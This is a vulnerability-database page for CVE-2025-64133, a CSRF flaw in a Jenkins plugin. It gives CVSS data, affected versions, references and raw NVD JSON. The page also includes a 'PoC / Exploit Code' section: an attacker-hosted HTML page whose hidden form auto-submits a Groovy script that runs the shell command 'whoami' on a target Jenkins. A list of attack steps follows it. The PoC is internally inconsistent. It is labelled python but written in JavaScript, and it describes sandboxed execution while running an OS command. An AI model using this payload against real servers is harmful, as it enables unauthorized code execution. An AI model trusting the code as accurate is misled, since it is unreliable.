CVE-2025-64133

Description

A cross-site request forgery (CSRF) vulnerability in Jenkins Extensible Choice Parameter Plugin 239.v5f5c278708cf and earlier allows attackers to execute sandboxed Groovy code.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:jenkins:extensible_choice_parameter:*:*:*:*:*:jenkins:*:* - VULNERABLE

Jenkins Extensible Choice Parameter Plugin <= 239.v5f5c278708cf

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-64133 CSRF PoC for Jenkins Extensible Choice Parameter Plugin
// This PoC demonstrates how an attacker can trick a Jenkins user into executing
// sandboxed Groovy code through a CSRF attack.

// Malicious HTML page that the attacker would host
const pocHtml = `
<!DOCTYPE html>
<html>
<head>
    <title>Jenkins CSRF Exploit - CVE-2025-64133</title>
</head>
<body>
    <h1>Loading...</h1>
    <form id="exploit" action="http://TARGET-JENKINS/descriptorByName/org.jenkinsci.plugins.extensiblechoiceparameter.ParameterDescriber/checkScript" method="POST">
        <input type="hidden" name="script" value="println 'whoami'.execute().text">
        <input type="hidden" name="" value="">
    </form>
    <script>
        document.getElementById('exploit').submit();
    </script>
</body>
</html>
`;

// Attack flow:
// 1. Attacker creates a malicious page containing auto-submit form
// 2. Attacker tricks Jenkins user into visiting the page
// 3. Browser automatically sends authenticated request to Jenkins
// 4. Jenkins executes the Groovy script in sandbox context
// 5. Results may be reflected back to attacker via various channels

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64133
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64133
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64133/
[4] VulDB https://vuldb.com/cve/CVE-2025-64133
[5] https://www.jenkins.io/security/advisory/2025-10-29/#SECURITY-3583
[6] http://www.openwall.com/lists/oss-security/2025/10/29/2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64133", "sourceIdentifier": "[email protected]", "published": "2025-10-29T14:15:57.463", "lastModified": "2025-12-22T15:24:38.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A cross-site request forgery (CSRF) vulnerability in Jenkins Extensible Choice Parameter Plugin 239.v5f5c278708cf and earlier allows attackers to execute sandboxed Groovy code."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:extensible_choice_parameter:*:*:*:*:*:jenkins:*:*", "versionEndIncluding": "239.v5f5c278708cf", "matchCriteriaId": "0863FAFD-5437-4F08-859B-3808AE30641E"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2025-10-29/#SECURITY-3583", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/29/2", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}